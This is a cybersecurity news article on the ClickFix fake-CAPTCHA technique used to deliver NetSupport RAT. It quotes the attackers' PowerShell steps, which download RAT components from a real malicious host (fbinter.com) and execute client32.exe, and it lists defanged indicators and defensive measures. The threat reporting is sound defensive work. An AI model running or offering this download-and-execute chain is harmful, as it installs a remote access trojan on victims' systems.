NetSupport RAT Grant Attackers Full Access To Victims Systems

   February 10, 2025  Posted in CyberSecurityNews


Cybersecurity experts have observed a significant increase in the use of the NetSupport Remote Access Trojan (RAT) in recent months, a malicious tool that allows attackers to gain full control over compromised systems.

This surge in activity has been linked to the “ClickFix” Initial Access Vector (IAV), a sophisticated social engineering technique that tricks users into executing malicious PowerShell commands.

NetSupport RAT, originally developed as a legitimate remote IT support tool in 1989, has been weaponized by cybercriminals to monitor screens, control keyboards and mice, upload and download files, and execute malicious commands.

SIEM as a Service

If undetected, it can lead to severe consequences, including ransomware attacks, data breaches, and disruption of business operations.

ClickFix Fake Landing Page (Source – eSentire)

The ClickFix technique involves injecting fake CAPTCHA pages on compromised websites, instructing users to copy and execute PowerShell commands.

These commands download and install the NetSupport RAT client, establishing Command-and-Control (C2) connections to attacker-controlled gateways.

Deployment of NetSupport RAT (Source – eSentire)

While analysts at eSentire discovered that the RAT payloads are often hosted on URLs containing “.png” in the path, and the C2 gateway URLs frequently include “fakeurl.htm.”

NetSupport RAT Payload Hosting and C2 (Source – eSentire)

Attack Analysis

The PowerShell script used in ClickFix attacks typically involves the following steps:-

  1. Random Folder Creation:
   $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
   $randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
   New-Item -ItemType Directory -Path $randomFolderPath
  1. Downloading RAT Components:-
   $url = "http://fbinter.com/a/1.png"
   $file = $randomFolderPath + "client32.ini"
   Invoke-WebRequest $url -OutFile $file

Similar commands are used to download other components like client32.exe and configuration files.

  1. Executing the RAT:-
   $file12 = $randomFolderPath + "client32.exe"
   Start-Process $file12
PowerShell Script Content (Source – eSentire)

To protect against NetSupport RAT and ClickFix attacks, organizations should deploy Endpoint Detection and Response (EDR) agents on all corporate assets and conduct security awareness training to educate employees about emerging threats like ClickFix.

Even limiting the user permissions can help prevent unauthorized software installations.

Organizations should also enhance security by disabling the Run prompt and restricting WScript.exe and Mshta.exe using Group Policy Objects (GPO) or Windows Defender Application Control (WDAC).

Staying informed about the latest IOCs and implementing effective security controls is crucial for protecting against these sophisticated threats.

Indicators of Compromise (IOCs)

  • ClickFix Pages:
  • hxxp[://]eveverify[.]com/captcha[.]html
  • hxxps[://]eiesoft.com/Ray-verify[.]html
  • NetSupport RAT Payload Delivery:
  • hxxp[://]fbinter[.]com/a/1[.]png
  • hxxp[://]fbinter[.]com/a/2[.]png
  • hxxp[://]fbinter[.]com/a/3[.]png

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free



Source link